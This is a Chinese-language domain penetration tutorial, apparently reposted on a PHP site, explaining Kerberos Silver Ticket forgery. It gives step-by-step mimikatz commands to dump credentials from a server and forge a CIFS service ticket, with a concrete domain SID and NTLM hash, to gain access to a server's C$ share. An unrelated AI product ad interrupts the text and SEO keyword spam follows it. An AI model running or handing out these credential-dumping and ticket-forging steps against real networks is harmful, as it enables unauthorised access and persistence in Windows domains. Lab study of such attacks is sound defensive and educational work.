目录

0x01 介绍

0x02 白银票据利用

0x01 介绍

在之前的文章中，我们详细探讨了Kerberos认证的流程，现在我们将深入讨论如何利用这一流程，特别是关于白银票据伪造（Silver Tickets）的技术。白银票据伪造主要利用了Kerberos认证的第三个步骤，在这个步骤中，客户端会携带ticket向服务器的某个服务发起请求。如果验证通过，客户端即可访问服务器上的特定服务。ticket的格式如下：

Server hash(server session key + client info + end time)

其中，client info是我们已知的，end time可以根据当前时间进行伪造，server session key由TGS生成。在ticket发送给服务器之前，服务器并不知道server session key的具体内容。因此，只要我们掌握了server hash，就可以访问服务器中的特定服务。

实际上，这种方法更像是一种后门，当我们拥有server hash时，可以随时向服务器发起请求。

总结白银票据攻击的特点如下：

1. 不需要与KDC进行交互
2. 需要服务器的NTLM hash

0x02 白银票据利用

我们将通过文件共享的方式来验证白银票据的利用。首先，尝试访问\WIN7-SERVER.zhujian.comc$，发现需要输入密码才能连接。

接着，我们使用mimikatz从服务器中导出hash：

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

成功获取了hash和其他相关信息。

然后回到客户端，使用mimikatz伪造票据，命令如下：

mimikatz "kerberos::golden /domain: /sid: /target: /service: /rc4:<ntlmhash> /user: /ptt" exit</ntlmhash>

相关信息的获取如下：

OneStory

OneStory 是一款创新的AI故事生成助手，用AI快速生成连续性、一致性的角色和故事。

319 查看详情

注意，SID不需要填写最后的-500。目标服务器的主机名应使用完整名称：

服务类型可从以下选项中选择，由于没有TGT来不断申请ticket，我们只能针对特定服务进行伪造：

用户名可以任意填写，因为在数据传输到服务器之前，服务器并不知道用户名。对于传输流程不熟悉的读者，可以参考《Windows认证 | 域认证》。

最终，我们得到的命令如下：

mimikatz.exe "kerberos::golden /domain:zhujian.com /sid:S-1-5-21-829259175-2571685386-1296789624 /target: WIN7-SERVER.zhujian.com /service:cifs /rc4:e467173f3c80e9f23084396625486f60 /user: secquan /ptt" exit

再次进行测试：

成功访问了服务器。

如果对Windows认证感兴趣，可以阅读以下文章进行学习：《Windows认证 | Windows本地认证》、《Windows认证 | 网络认证》、《Windows认证 | 域认证》、《SPN扫描》、《Kerberoasting攻击》。

推荐阅读：

• 离线破解N*icat密码
• php-fpm在nginx特定环境下的任意代码执行漏洞（CVE-2019-11043）
• Linux权限详解
• Linux文件查找命令详解
• Linux重定向及反弹shell详解

如果本文对你有帮助，请点击“在看”或转发，这对我是一种支持。

以上就是域渗透 | 白银票据利用的详细内容，更多请关注php中文网其它相关文章！

# windows  # php  # linux  # word  # go  # nginx  # navicat  # session  # win7  # ai  # win  # 不需要  # 客户端  # 微软  # 不受  # 相关信息  # 免责声明  # 自带  # 访问权限  # 下载并安装  # 器中  # 视频平台怎么做seo  # 岑溪seo优化公司  # 餐饮网站建设排名靠前  # 网站建设优化如何选号  # 建设网站销售  # 重庆做网站建设推荐哪家  # web环境建设网站  # 汕头seo优化哪里好  # 天台seo排名优化流程  # 壹站传媒关键词排名